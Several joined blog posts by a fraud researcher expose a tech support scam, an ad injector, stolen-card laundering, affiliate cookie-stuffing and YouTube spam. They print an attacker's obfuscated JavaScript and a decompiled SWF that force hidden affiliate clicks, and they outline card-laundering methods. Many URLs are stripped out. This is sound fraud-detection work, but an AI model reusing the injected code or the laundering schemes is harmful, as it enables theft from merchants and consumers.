In the Tech Support scam, a scammer hijacks a well known brand in an effort to lure a victim who is then deceived into paying for an unnecessary/non-existent service or installing malware infected payloads.

This scam has been picked up by quite a few players in the last couple of years, successfully catching people left, right and center. If you want to bring yourself up to speed on how scammers have evolved in this space, you’ll find lots of documentation from the FTC, the Malwarebytes team and Microsoft.

When I think about a scam, of course the first question I ask is who is the victim, and eventually it’s interesting to figure out how the money flows. In today’s example, I’ll show you how a Tech Support scam flows from beginning to end. We’ll discuss who the victims are and we will examine the players that make money from all of this.

So with a couple of cell phones, a few false names and an intentionally flawed Virtual Machine (one which had not been activated) I decided to see what Tech Support scams looked like for myself.

The reason I chose a VM which had not yet been activated is because I wanted to see if the people I phoned for tech support pointed out the most obvious potential problem with the machine, i.e., that it had not yet been activated.

Online Advertising

On Friday the 23rd of May 2014, I found this Google advertiser:

google_advertiser_5_23It looks like he has an advertising campaign that is constantly running and targeting folks who are looking to log into their RoadRunner email:

5/23 – Google Advertiser URL leads to
5/23 – Google Advertiser URL leads to
5/24 – Google Advertiser URL leads to
5/27 – Google Advertiser URL leads to

For each of these ads, the landing page will display the following message:

“Attention: Your Account Has Been Disabled Please Call 1-855-666-8849″

google_advertiser_tech_support_scam_0It’s obvious what is happening here, but to be clear: this advertiser has hijacked the TWC Road Runner login page and is trying to deceive the user into thinking that there is a problem.

Depending on your referrer to this page is (the site responsible for sending you here), the message could also be:

“Attention User Account Is Under Review Please Call RoadRunner Support 1-800-463-6338″

That the message/number changes matters not, for the intent remains the same: deception. In each case the advertiser has hijacked the TWC RoadRunner page and is trying to con the user into phoning the falsified tech support line.

What I thought is really interesting here is that they are not even bothering to steal credentials, they just want you to call in and fall victim to a quick scam that will send real dollars their way. Re the pic below, note that I entered false credentials and then pushed Login. Upon analyzing a packet trace for this activity, I found no evidence of credentials being sent to a server.

google_advertiser_tech_support_1Error code: RR-D68547 Your Email Account Has Been Temporary Suspended Due to Suspicious Activity Detected. Please RoadRunner Support on +1-800-463-6338

Not stealing credentials actually makes a whole lot of sense if you think about it a little. If they were stealing usernames and passwords then this would be an open and shut case. It would not take much for chaps like me to gather evidence against players that steal credentials in this manner, in which case they could land themselves in hot water pretty quickly.

Moving on, I called the guys behind 1-855-666-8849  a few times and each time I phoned they always answered with “Thank you for calling <GARBLED> technical support”. The <GARBLED> part is intentional from their side, they want you to think it’s your fault you did not hear them properly. Sometimes I asked what technical support they were, but I never got an answer.

Download audio

Unfortunately my initial attempts to get to the bottom of the scam didn’t get me very far. I think I came across as unconvincing, someone who may be a threat to their scam and so each time they ended up putting the phone down on me. Upon reflection, I think my problem was that I assumed that they were trying to sell me an antivirus solution from the get go, so my guess is this is what kept throwing them off. They would always tell me my computer was broken/compromised, that things had gone wrong and they needed to access it. They never told me how to facilitate this, I told them I had no idea what they were talking about and kept waiting for them to take the lead.

As I kept trying to see what this particular tech support scam was all about, it became evident to me that where other scammers were trying to get folks to download and install something, these guys were up to something different.

So I involved a senior citizen (my dad!), someone who I figured was the real target of their scam.

The result was quite different.

Download Audio

Highlights of the call:

04:50 scammers convince my father to let them take control of the machine. They ask him to load, this redirects to where they then ask him to enter the code 24227


07:10 My father asks who they are, he clearly says “Are you TWC?” This is followed by a moment of silence and then their response “Yeah”

09:39 They have taken control of the machine, they then ask my father to log into his email so they can see the problem. What they did here was really sneaky. As he was typing in the password, they would keep pushing the caps lock key on their side, which meant that even if we were at the right service URL typing in the right credentials, it would be entered incorrectly and our login would be denied. This would open the doors for the scammers to prove that there certainly was a problem.

scammers 210:28 you can hear my father tapping the keyboard five times for a five character password and counting silently to himself. Mysteriously, a sixth character appears in the password prompt. Obviously scammers are entering the final character to keep forcing incorrect credentials.

scammers 411:30 scammer opens a command line window and types “EMAIL HAS BEEN HACKED”. My dad falls for this and starts to panic, when my father asks if his email has been hacked the scammer says “Yeah, that’s the problem sir, yeah”

scammers 5

13:58 scammer says “don’t worry, I am here to help you” whilst trying to scare my father by showing him logs from the Windows event log, all of which is completely normal

18:52 “are you a senior citizen sir?”

“Yes mam I am 76″

19:22 my father asks “are these experts from Microsoft?” to which the scammer responds “yes sir”

20:00 scammer explains to my father the difference between what Bestbuy’s Geek Squad offers and what they are offering. It’s all so confusing, but it’s supposed to be a good deal. Note the question my father asks at 20:50

“And these are specialized technicians from Microsoft, Yes”


scammers 6scammers 721:56 scammer loads up and logs in with merchant id “ishan.865tasu”

scammer 8 scammer 10For the first time we are privy to what their real identity may be, or at least what they are using to transfer funds: “International Technical Support Corporation”. If you’re following this call carefully, you know that the scammer just made a mistake on their side. They just logged my father directly into their merchant account obviously they don’t know that I just fell off the chair next to him.

22:50 They enter the Order ID ITSC102504 and will try to convince my father to complete the form with his details. Note the question my father asks before trying to complete the form

“Do you have special rates for over the age of 75?”

scammer 12

23:38 My father asks if he can spend the $599 over a period of time instead of one large payment. He explains that $600 is his rent for the month. They know he is an elderly gentleman, they know they are exploiting his trust. They know they are about to steal money that he cannot spare. What’s sad here is that my father is not a victim, but they don’t know that. How many elderly people have potentially fallen for this scam? We’re about to answer that questions thanks to these guys logging us into their merchant account.

26:18 scammer shares their address: “1113 6th ave, New Hyde Park, NY 11040″

31:00 scammer becomes impatient after we click refresh, nullifying everything we had spent the last ten minutes completing. She decides to transfer us to another scammer, but we decide to end her remote session and take a closer look at their merchant account.

Of interest to me at that point in time is how much money these unscrupulous individuals have made thus far. I used the Quickbooks feature of the merchant panel to get a quick idea.

scammer 13

Just to be clear here, for this account alone the scammers have conned 1538 people with this scam. At a total of $439,254.91, they are averaging $258 per person. What’s more terrifying here is the extremely low 3% rate of chargebacks/reversals. These are people that were savvy enough to see the scam and then demand a refund from their credit card company.

I shouldn’t have to say that this practice is unscrupulous. These are without a doubt scammers of the lowest possible order, bottom feeders that target old people and those that are not tech savvy enough to know any better.

The Players

1. Google facilitates the first part of this scam by allowing advertisers of this ilk onto their network. Average users, old people, kids, moms, tech elites, you name it, they trust the results given to them from a search engine. So why shouldn’t they trust what the page behind that first click tells them: “Attention: Your Account Has Been Disabled Please Call 1-855-666-8849″. After all, there’s no warning on the search result page saying “Hey be careful of these advertisers, we have no idea who they are or what they are going to try to sell you!”

Obviously the scammers know how trust is delegated here, so they will pay Google to exploit this as an advertiser for as long as they are allowed to do so.

But is Google a victim? Sure. Whilst they are taking the scammers money to show the ads in question, they are also indirectly a victim. Fingers will point to services the likes of theirs when one tracks back the scam to its origin.

2. NMI.COM – Network Merchants LLC, for a fee I presume, is allowing the money to flow from the target of the scam (my senior citizen dad in this case) through to the scammers. At the end of the day what the scammers are doing here is wire fraud, plain and simple. So if NMI didn’t know about the half million dollars these scammers potentially defrauded from victims before, they sure know about it now.

3. TWC Road Runner. They’re another victim. It’s their service that is being hijacked and their users plundered. Ultimately victims are dialing the support number listed because they thought TWC Road Runner disabled their account.

4. Microsoft. The scammers are using legitimate programs on a Microsoft Operating System to make the victims think something is wrong with Microsoft software. We know that it’s all just a lie though, the event  viewer is filled with legitimate warnings and errors. Typing “EMAIL HAS BEEN HACKED” in a command prompt does not mean that your email is hacked.

Furthermore, they hijack the Microsoft brand by saying that they are from Microsoft. Recall 19:22 where my father asks “are these experts from Microsoft?”

“yes sir”

5. The scammers themselves. From the Google ad landing pages, we know of three domains that they are using:, and Whois pages for these (here, here and here) list Dayanad Colony as the registrant using the number +91.9818290300 and email address

So what now?

Why are unscrupulous advertisers of this ilk allowed to run rampant? How is it that they can get away with something like this over and over again? Why aren’t the players responsible for playing a part in all of this (knowingly or unknowingly) made accountable here?

There’s no shortage of articles on bad guys like this [1,2,3,4] and from the merchant account above it’s obvious that these guys are profitable, so what gives?

The bottom line is that it’s the innocent consumers that are being nailed over and over again. Hard legal action coming in on the tail end of these scams is just not going to solve anything. In my mind I see the need for a very big and very angry gorilla stepping into the arena of online advertising sometime soon, and its name is regulation.


* 5/29/2014 – download links to the audio added *

* 6/3/2014 – scammer is still running strong through AdWords (Advertiser URL), now using the domain and the number 1-855-808-1175 *

Search for “download skype”, “download google chrome”, “download firefox” or a myriad of other popular applications and you may find yourself unlucky enough to run into an ad injector.

Now an ad injector won’t present itself as an ad injector. Typically, it will bundle itself into an installer which will opt the user into installing a handful of programs onto her machine in addition to what she was originally looking for.

Sure, technical elites out there have no problem picking up on the subtle clues from an installer that an ad injector lies in waiting  (maybe they read the entire license agreement sometimes pointed to at the bottom of the screen), but less tech savvy folks think they are only getting what they were searching for. Nothing less, and arguably most important: nothing more.

Obviously, that’s not the case in today’s example, as we discuss an ad injector making the rounds and going by the name of Bee Coupons.

In the images below, with Bee Coupons installed courtesy of an installer on what was originally an uncompromised machine, I searched for “click fraud” on Google comes back with its responsive UI and I see exactly what I was expecting less than a second after pushing enter:

ad injectors and affiliate fraud may be good for business, but who's?Unfortunately, whilst Google was fetching its response to the “click fraud” query, Bee Coupons software was getting a result of its own. A few seconds pass and Bee Coupons decides to “enhance” Google’s search result with their own addition:

clickety clicky, kechang!

Of course the “enhanced results” aren’t really enhanced results at all, they’re ads. Upon clicking on those ads an advertiser will be charged a fee. The advertisers involved in this particular transaction are and They may or may not be willing participants in this, for the online advertising ecosystem is fraught with so many complexities and third parties, that unless you sit and dissect a packet trace from start to finish every single time, it’s difficult to conclusively say who is who. Nonetheless, the odds are that Zoosk and Ask will be charged a fee upon a click.

But then where does the money go?

Good question, ordinarily the money would go to Google. You see, that’s how they fund the largest search engine on the planet, with ads from their own advertising network. More often than not they have a direct relationship with the advertiser. When Google is the publisher of an ad and the advertising network as well then they collect 100% of the fee. There are instances where Google is not the publisher of the ad, but facilitates delivery of the ad through their ad network, in which case Google still collects a fee from the advertiser, a portion of which is then given to the publisher.

I’m confused, how does Google make money here?

Google does not make money here, for whilst they are the publisher in this example they will not be paid upon someone clicking on the Zoosk or Ask ads. This is because those are ads that were not put there by Google. The ads belong to an entirely different advertising network that has hijacked the Google Search Result Page and inserted their own means of generating revenue.

Now the first rebuttal offered from an ad injector is that they received the permission of the user operating the computer in question to do this. Whilst this statement may be true (assuming the operator was not a child — popular target of installers), it’s inconsequential for they did not receive permission from the entity that mattered: the real publisher of the content, i.e., Google.

So to be clear, again, the ads that have been injected into Google’s site do not belong to Google.

So who do they belong to?

I clicked on the little “i” next to “Ads by Bee Coupons” and was directed to a page on that offered to explain why I was seeing the ads in question:

You may be seeing ads as part of our advertising solution for Internet properties (such as websites or web browser extensions). This solution provides content at no cost to you and displays advertisements during your web browsing experience. It was installed by you, or someone using your computer.

“at no cost to you” is highlighted because this statement cannot always be true. If you are the publisher of content on the Web (say Google, for example) and Bee Coupons comes along and pushes your top advertisers down (who bid good money to be there) in order to make room for Bee Coupon’s advertisers, then there may indeed be a cost to you. The user that clicked on Bee Coupon’s ads did not click on your ads, which is ultimately money that should have been sent your way. Not earning when you could have is most definitely a cost and if you were Google in our example above then you shall bear the brunt of it.

What’s more interesting here is that the “advertising solution” installed on the machine (Bee Coupons in my case) is not available for download from In fact, I could not find any advertising solution software at all, and that’s where the installers come in.

It’s worth spending a few more moments looking at

Revenue Skyrockets with Solutions from Advertising Support!

Solutions that are divided up into two categories, advertisers and publishers.bee_coupons_click_fraud_3

For advertisers:

advertising-support iPensatori comments
Competitive Rates This is the very reason why ad injectors exist at all, they offer competitive pricing. Instead of playing ball with the rest of the industry on advertising networks with established prices and that have permission to place their ads on a publisher’s site, advertisers enjoy better placements on premium publisher properties at lower rates with ad injectors
Traffic in all countries Welcome to the Internet
High quality traffic It most certainly is. This is why advertisers pay the big bucks to be in the #1 spot on Google

For publishers:

advertising-support iPensatori Comments
Very easy to implement One can’t help but wonder which publishers they are talking about here. It’s certainly not the publisher of the content (Google in our example), although if they were then it is pretty easy to implement: Google did nothing.
Non-Intrusive to users No comment
Maximized Earnings ?

Other Publishers Receiving Enhanced Ads

Google is not the only target of Bee Coupons. In order to satisfy the claims made above they have to inject ads into a number of top quality publishers. I captured a few samples below.






 Enter the Affiliate

Affiliates are masters of marketing, which makes sense and in a way justifies the whole industry. A small company that is really good at putting together trips to the Amazon jungle may not know the ins and outs of online marketing, or even care to know it since their specialty is trips to the Amazon jungle so why concentrate on anything other than improving this service. As a result it is well within their interest to offload the marketing portion of their business onto affiliates in return for cutting them in on a slice of the pie when there is a sale. How wonderful!

Wonderful, that is, until a rogue affiliate enters the picture.

bee_coupons_click_fraud_4This packet trace steps us through the chain of events that happened behind the scenes upon clicking on the first Amazon advertiser provided by Bee Coupons:

  • Our adventure begins with, a GET request with no referrer header (entity responsible for the traffic, usually the publisher) will return Javascript that will create an element in the DOM and click on it. So many reasons for doing this, one of which is to pick up a brand new referrer
  • Automated click from the JS above results in a GET request to with the referrer header now set to Response here includes JS which will redirect the browser to another script on
  • Response from redirects to which uses JS to redirect to Amazon via an Amazon affiliate link

Net effect is that one of Amazon’s affiliates (affiliate id advertiseco0e-20) basically out bid Amazon (with probably less money thanks to the injector) for the top spot on Google when searching for Amazon. If the user searching for Amazon clicks on this ad and then buys something from Amazon within a certain period of time (say 24 hours) then the affiliate responsible for purchasing the ad from the injector will be paid a commission.

Amazon may allow this behavior, but it seems unlikely that they do. Some simple reasons why not:

  1. Ultimately Amazon will be paying a commission on traffic that they would have received anyway, for not only were they the first ad displayed before the injector arrived, but they were the first organic link displayed as well
  2. This practice is awfully unfair to the honest Amazon affiliates out there that don’t know about ad injectors, since their cookies will be overwritten by the affiliate using the ad injector.

I’ve spent the last few years presenting at a number of affiliate conferences, meeting and shaking hands with affiliates in person, people who make affiliate marketing their primary means of making ends meet. They don’t know how to broker relationships with questionable traffic sources. They’re not programmers. They have never heard of practices the likes of referrer laundering, blackhat marketing, cookie-stuffing or pay per view marketing and they most certainly don’t know the ins and outs of ad injectors.

So if you’re an honest Amazon affiliate competing for the same traffic that this ad injector is sending to Amazon affiliate advertiseco0e-20, know this: you don’t stand a chance

Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.


I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look. is a surprising resource here. Point your browser to your favorite search engine and type in the following query:


The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

United States American Express $7.00
United States Discover $8.00
United States Visa & Mastercard $4.50
Europe American Express $12.50
Europe Discover $18.00
Europe Visa & Mastercard $14.50
Asia American Express $18.00
Asia Discover $18.00
Asia Visa & Mastercard $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quick as you can and make a clean getaway. One way to do this is sell items at a discount on online market A, once these sell then you buy the product through online market B with the stolen card and ship to the buyer from market A. Easy.

It’s a simple scam but scammers are lazy and this sounds like too much work. Mostly in the sense that it takes so long to make it all happen. Money would only slowly trickle in and by the time it starts any meaningful income then the account on A could get closed at any time (buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (detection), but from what I have read it’s surprisingly easier to get up to speed here than I thought it would be. A few searches on eBay for the model number of a card writer (“MSR605″) yields a list of auctions with card writers that are ready to roll for less than $150.

ebay-writer-0  ebay-writer-1ebay-writer-2Note that the software provided with the writer facilitates pushing track 1/2/3 data onto an offline card. Track 1/2/3 is the credit card data for sale on the underground economy — it is stored on the magnetic stripe of your card

credit card track 2 data

A scammer that is printing his/her own cards can then purchase fairly expensive and hard to track items from offline stores (jewelry) which can then be sold for sale at a discounted rate online. Since the scammer paid nothing for the items that have been purchased, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, and making sure only to purchase hard to track items, mitigates the risk of the scammer’s online account responsible for sales being reported and his efforts going to waste.

As mentioned earlier, there’s a fair amount more risk involved with this scam, in the sense of getting caught and going to jail. Obviously moving the scam offline means that the scammer has to participate in the physical world that is bound to the same laws of the people that he/she is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops whilst putting on a ruse for the scammer. A card could have been reported as stolen between purchasing the data and printing it to a card, prompting a call to the credit card company when swiping the card.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. Scammer will buy goods using a stolen credit and sell them at a discounted price to a buyer through the market. Merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another perhaps a more strategic fraudster would present his thoughts on their weakest links in the ecosystem

“Fellow fraudsters, blackhatters and scammers, as many of you are surely aware, we’re being hit left and right with anti-abuse and fraud detection efforts. We’re no longer in the good’ol wild west days of the 90s, and so as much as we have to cover our tracks more than ever before, we must also improvise our methods. Make no mistake about it: knowledge and creativity will be our strongest asset if we want to be successful in the future”

He’d then present something similar to the following:

scammer hustle and flow 2

Now it’s not obvious to think like this. What’s important to remember is that all the fraudster is doing here is eliminating bottlenecks and potential risks in order to optimize his path to profit. So ultimately what the fraudster is saying, is why waste time with merchants and legitimate buyers when the enterprising fraudster can be both!

The Scam

It’s really simple, deceptively so, but the scam is for the fraudster to be both the buyer and the seller and not have to depend on a merchant for a supply of goods and/or services. By selling to himself at a price that he thinks is about right, he launders the stolen credit card through the market in a manner that is quick and almost risk free.

“That’s good in theory, but where would you apply this idea?”

When you think about a fraudster being both the buyer and the seller, then certain scenarios that used to be quite puzzling suddenly become rather clear.

App Stores

These markets make for prime targets. Just think about it a little, fraudsters can sell something that cost next to nothing to build (basically it’s just the cost of cycles on their CPU to build an empty app) and the market will happily onboard yet another publisher in their ever increasing app store (now with millions of apps!).

Since the app store takes care of processing the buying and selling of the apps, it’s up to the fraudster only to make sure that each purchase he makes from himself with a stolen card (as many as possible whilst being careful not to raise any alarms) looks legitimate. The app store market will take care of the rest, and voila: credit card(s) laundered.

With this in mind, maybe now you’ll have an answer to the following question next time you are browsing around a very large app store:

“Why on earth would anyone actually pay money for this app? It just doesn’t do anything.” ranks in the top 54,000 sites world-wide. Load it up in your browser and you’ll see nothing out of the ordinary. Fire up a Web debugger and monitor the outbound traffic from your machine though, and you will see an entirely different story: affiliate fraud.

This site has been compromised and the attacker (aka babyface) is using it to force the user’s browser into invisibly visiting a number of merchants via affiliate links. If the user then buys anything from the merchants in question within a certain amount of time, the fraudster behind all of this is paid a commission.

As always, finding the fraud is easy but telling the story of how it happens is the tricky part. This one had me stumped for a few minutes, so if you are up for a challenge then try it out for yourself before reading any further. If you’re still stumped, then let’s begin.

With reference to this packet log, loading up is going to result in a request which is then responsible for requesting The ASP file returns a list of URLs (affiliate clicks included), the Flash payload in the browser then invisibly requests each of the links and cookies returned in these lookups result in forced/faked affiliate clicks.

The question now is where does the initial request to come from, i.e., what exactly is responsible for it? If you do a search for it statically (scan the HTML, search the packet trace) you’re not going to find the element responsible. And if you do a dynamic search (via the DOM) you’re still not going to find it. Babyface is somewhat predictable in that like much of the technical marvels blackhats in this space, he was not the brightest bulb on the ever shrinking Christmas tree specially reserved for them: he was totally predictable.

Take a look at and you’ll find what looks to be a Jquery library. But keep digging and you’ll come across something that shouldn’t be in there:

(function(){if(document.cookie.indexOf(String.fromCharCode(98, 97, 98, 121, 102, 97, 99, 101))==-1){try{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);var c=document;c.cookie=String.fromCharCode(98,97,98,121,102,97,99,101)+"=Yes;path=/;expires.../code>

In compromising this site, he has hidden his activities in this Jquery library. I've broken this down with the addition of my own comments (that's everything after //):

// so what we have here is code that will run every single time 
// loads on a javascript enabled browser
  // Babyface is checking to see if a certain cookie has been set. 
  // If it has not then the following code will be executed. 
  // Instead of putting the name of the cookie as a string in the code
  // this genius has tried to throw investigators off of his tracks 
  // by making it a sequence of characters, when you evaluate these 
  // characters the name of the cookie comes out to "babyface" 
    String.fromCharCode(98,97, 98,121, 102,97,99,101))==-1)
      var expires=new Date();

      // babyface sets an expiry date for the cookie
      // 24*60*60 = 86400 seconds which is one day. so basically
      // he doesn't want to repeatedly attack the same browser
      // if it visits the site more than once in 24 hours
      var c=document;
        + "=Yes;path=/;expires="+expires.toGMTString();
      var s=c.createElement("span");

      // getting ready to inject a flash payload which will kick 
      // off the attack. The payload is delivered from character 
      // sequence below which equals ""
      var p=String.fromCharCode(
        + "?i=" + (new Date()).valueOf();
        '<object type="application/x-shockwave-flash" data="'+p
        +'" width="1" height="1"> ';

So the JavaScript above answers our earlier question of what is responsible for the request to The SWF that is loaded a result of this JavaScript then calls an ASP file which has all of the links to which a visit will be forced. This SWF decompiles to the following dreadful code:

package flashcs_old_fla {
    import flash.display.*;
    import flash.system.*; 
    public dynamic class MainTimeline extends movieclip {
        public var loader:URLLoader;
        public var url:string;
        public var reqURL:URLRequest;
        public function MainTimeline(){
            addFrameScript(0, frame1);
        function frame1(){
            url = "";
            reqURL = new URLRequest(url);
            loader = new URLLoader(reqURL);
            loader.addEventListener(Event.COMPLETE, handleComplete);
            loader.dataFormat = URLLoaderDataFormat.VARIABLES;
        public function handleComplete(_arg1:Event):void{
            var loader:* = null;
            var safe:* = nan;
            var url1:* = null;
            var url2:* = null;
            var url3:* = null;
            var url4:* = null;
            var url5:* = null;
            var url6:* = null;
            var url7:* = null;
            var url8:* = null;
            var url9:* = null;
            var url10:* = null;
            var url11:* = null;
            var url12:* = null;
            var url13:* = null;
            var url14:* = null;
            var url15:* = null;
            var url16:* = null;
            var url17:* = null;
            var url18:* = null;
            var url19:* = null;
            var url20:* = null;
            var request1:* = null;
            var request2:* = null;
            var request3:* = null;
            var request4:* = null;
            var request5:* = null;
            var request6:* = null;
            var request7:* = null;
            var request8:* = null;
            var request9:* = null;
            var request10:* = null;
            var request11:* = null;
            var request12:* = null;
            var request13:* = null;
            var request14:* = null;
            var request15:* = null;
            var request16:* = null;
            var request17:* = null;
            var request18:* = null;
            var request19:* = null;
            var request20:* = null;
            var event:* = _arg1;
            loader = URLLoader(;
            safe = new number(["safe"]);
            url1 = new string(["url1"]);
            url2 = new string(["url2"]);
            url3 = new string(["url3"]);
            url4 = new string(["url4"]);
            url5 = new string(["url5"]);
            url6 = new string(["url6"]);
            url7 = new string(["url7"]);
            url8 = new string(["url8"]);
            url9 = new string(["url9"]);
            url10 = new string(["url10"]);
            url11 = new string(["url11"]);
            url12 = new string(["url12"]);
            url13 = new string(["url13"]);
            url14 = new string(["url14"]);
            url15 = new string(["url15"]);
            url16 = new string(["url16"]);
            url17 = new string(["url17"]);
            url18 = new string(["url18"]);
            url19 = new string(["url19"]);
            url20 = new string(["url20"]);
            if (safe == 1){
                try {
                    request1 = new URLRequest(url1);
                    request2 = new URLRequest(url2);
                    request3 = new URLRequest(url3);
                    request4 = new URLRequest(url4);
                    request5 = new URLRequest(url5);
                    request6 = new URLRequest(url6);
                    request7 = new URLRequest(url7);
                    request8 = new URLRequest(url8);
                    request9 = new URLRequest(url9);
                    request10 = new URLRequest(url10);
                    request11 = new URLRequest(url11);
                    request12 = new URLRequest(url12);
                    request13 = new URLRequest(url13);
                    request14 = new URLRequest(url14);
                    request15 = new URLRequest(url15);
                    request16 = new URLRequest(url16);
                    request17 = new URLRequest(url17);
                    request18 = new URLRequest(url18);
                    request19 = new URLRequest(url19);
                    request20 = new URLRequest(url20);
                } catch(e:error) {

}//package flashcs_old_fla

I give babyface a 1/10:

  • 1 point for Cookie-Stuffing
  • 1 point for compromising a server
  • 1 point for covering his tracks with obfuscated javascript
  • 1 point for trying to protect himself through javascript-set cookies
  • 1 point for having an SWF payload do the dirty work
  • -1 point for putting all of his eggs in one basket in the ASP response. Full dump here. Note the Amazon China affiliate click link (affiliate id 51fanlirb-23). He should be rotating through each of these and protecting them from investigators and other blackhat competitors
  • -3 points for absolutely dreadful code in the SWF

Cost Per Lead (CPL) is an advertising model where the advertiser pays for sign-ups from interested consumers. Affiliates play the middle men in these transactions for they send the interested consumers in the direction of the advertiser. So for each consumer that signs up with the advertiser, the affiliate in question is paid a commission or small fee. By offloading the task of sourcing consumers onto the affiliates, advertisers are spared the hassle of everything that this work involves. So it’s a great model, but unfortunately still open to abuse.

The following screenshot shows the MaxBounty program for the World of Tanks advertiser. world of tanks affiliate fraudNote the following:

  • Commission rate of “$2.65″/lead. This means that the advertiser will pay affiliates $2.65 for each sign-up that is sent their way
  • The advertiser is only interested in traffic from USA or Canada
  • Incentive traffic is prohibited, indicating that affiliates can not encourage consumers to sign-up with the advertiser by offering rewards the likes of cash or points in some program.

Now take a look at a screenshot from an online forum that pays subscribers to do small online tasks (much like Amazon’s Mechanical Turk):
world-of-tanks-2Do You See What I See?

Most seasoned affiliate managers know where this is going, but don’t worry if you’re not sure where we’re heading yet because we are going to go through this step by step.

The online forum is offering $0.40 to users in USA or Canada who will sign up using the link that has been provided. This is a packet trace of me following the link using my browser, the screenshot below shows the result.

world of tanks affiliate fraud This is what’s going on in the packet trace:

  1. Subscriber in the online forum decides he wants the $0.40 on offer in the online form
  2. He/she starts the task by navigating to
  3. Tinyurl redirects to which then uses Javascript and an HTML form to redirect the browser to (this essentially launders the referrer)
  4. sets up a full screen iframe which contains which redirects to the following affiliate click URL:;c=63867&amp;a=105565&amp;s1=tanks
  5. This URl redirects to which redirects to

So what you have here is an affiliate taking advantage of a price differentiation in two markets. Of course, one of these markets is of his own creation, but essentially this equates to arbitrage (pay $0.40 and sell $2.65) and a bad deal for Worldoftanks (the poor advertiser that bankrolls this operation).

YouTube Spam

By Wesley Brandi in CPL | Spam - (1 Comment)

Spend some time on YouTube and you may run into comments like

Make money working from home, get paid $$$ to fill in surveys. Go here…

Needless to say, the comments bring no value to the context of the video that you may be watching. More often than not it is exactly the same comment over and over, i.e., it’s YouTube Spam.

In this post, we try to answer the following :

  • How big of a problem is this spam for YouTube?
  • How do the spammers monetize?
  • What tools & tricks are employed by the spammers?

Scope of the Problem

If we were on the backend of YouTube, we could take a naive approach to appreciating this problem:

“These are all our videos (N). Each video may be connected to a set of tainted comments (T); We consider a set of comments to be tainted when it contains spam. Having defined a function to determine if a set is tainted, we then get an idea of the scope of this problem by dividing T into N”

Of course, it doesn’t take into account the rank of each spammy comment, but that’s why this is called a naive approach.

Now we’re not on the backend of YouTube, but we are privy to the very front end of YouTube. In fact, we try to get a rough idea of how much of a problem this is by taking a look at only the default page presented when visiting This approach should work well for us because

  • it’s a whole lot smaller than N above, so it’s reproducible for the folks at home
  • it’s a page with massive traffic so will have massive attention from the spammers
  • it’s a page with massive traffic so will have massive attention from the YouTube abuse team

The following YouTube page was loaded at approximately 5pm on 8/5/2013

youtube spam sample setThere are 40 videos presented on the front page. If you’re going to try this for yourself at home, then you need to click on each of the videos and scroll down into the comments. Fortunately (or not), you don’t have to scroll very far because the spammers have a knack for having their comments placed right at the top. What you’re looking for is something like this:

youtube spam comment

For this particular sample set, we were quite surprised to find that 9 of the 40 videos had tainted comments:youtube spam

Now 22.5% of the front page videos having tainted comments may not sound like an awful lot, but when you consider that this is for the third most popular page on earth (Alexa Rank #3), then what’s going on here starts to take on a whole new perspective.

Monetization Path

So what’s really going on here?

At the very least, we know that spammers are targeting a significant percentage of the videos on YouTube’s front page. Of course, they’re not doing this for their health so how do they make their money?

Consider the comment on the first highlighted video presented:


This is how i am making tons of money every single month working at my house..

Step 1: Follow the guide on this page:\nb1Bak

Step 2: Get paid 5-20 bucks to answer each survey

Step 3: Retire and move overseas

This is a packet trace of the network activity on a machine when you browse in a browser:

  • is Google’s URL Shortener.
  •\nb1Bak redirects to which redirects to
  • This then redirects to

“So is the spammer?”

No, is not the spammer. Surveyjunkie is an advertiser in a Cost Per Lead (CPL) advertising model. They have an affiliate program which rewards affiliates when users sign up (leads). The spammer in this scenario is one of surveyjunkie’s affiliates (specifically ‘klenzxcp’), he is paid a finder’s fee when YouTube users sign up with

Now this may or may not violate surveyjunkie’s acceptable terms, although I could not find a policy detailing these terms. Of interest from the packet trace is that the Web request through to does not contain a referrer header, so surveyjunkie does not get to know where the traffic comes from. So they won’t know that it’s YouTube spam. One could argue that they choose not to know, but who is going to argue that?

“Okay but this is just a once off, you’ve only analyzed one comment”

Actually we analyzed all outbound links on all of the tainted comments. In this case all roads lead to via two affiliates (klenzxcp and gqrzv5sx):

youtube spam leads to surveyjunkieModus Operandi

Obviously the spammers are capitalizing on a great source of traffic. You could argue that the traffic is free but you would be wrong. The traffic is pretty cheap, but it’s not free. If you were going to pull this off yourself as a spammer new to the scene, then you’d need a couple of things

  • A set of accounts to post the initial spam as a comment (A). Any spammer worth his weight will suggest using Phone Verified Accounts. You could set these up yourself or you could buy 10 for $5

youtube pva accounts

